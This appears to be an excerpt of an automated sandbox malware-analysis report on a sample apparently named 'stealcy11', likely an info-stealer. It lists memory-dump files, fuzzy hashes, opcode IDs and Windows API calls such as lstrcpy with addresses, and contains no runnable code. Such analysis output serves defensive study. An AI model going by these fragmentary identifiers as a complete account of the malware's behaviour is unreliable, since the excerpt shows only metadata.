                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heapmemcpy$AllocProcess
                                  • String ID:
                                  • API String ID: 1643994569-0
                                  • Opcode ID: 84cdf451b47ba9daa7e2eb6f2155cf7befd66f9ea58d2af040d245b22f8d9d59
                                  • Instruction ID: bd354ec3ce237cefb85ad15bde008e50a9bddee7cc72ae370ef9499197a985e6
                                  • Opcode Fuzzy Hash: 84cdf451b47ba9daa7e2eb6f2155cf7befd66f9ea58d2af040d245b22f8d9d59
                                  • Instruction Fuzzy Hash: D9219DB06006429BEB208B26DC84BBB73E9FB56744F444468FA46CB684FB78E951CB51
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 008E152D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E154F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1571
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1593
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 2e3476918b2859d40cd95c878039dc0efcf5d544674ffa065a508f29db8d1770
                                  • Instruction ID: 6ffd3353cf0f5cff34eb7e7a1b344c080d961430545b9939dfa88a175abff52a
                                  • Opcode Fuzzy Hash: 2e3476918b2859d40cd95c878039dc0efcf5d544674ffa065a508f29db8d1770
                                  • Instruction Fuzzy Hash: 3211ECB4A01B82ABDB249F7AD45C927B7F8FF8A711304452DA857C7B50EB30E950CB90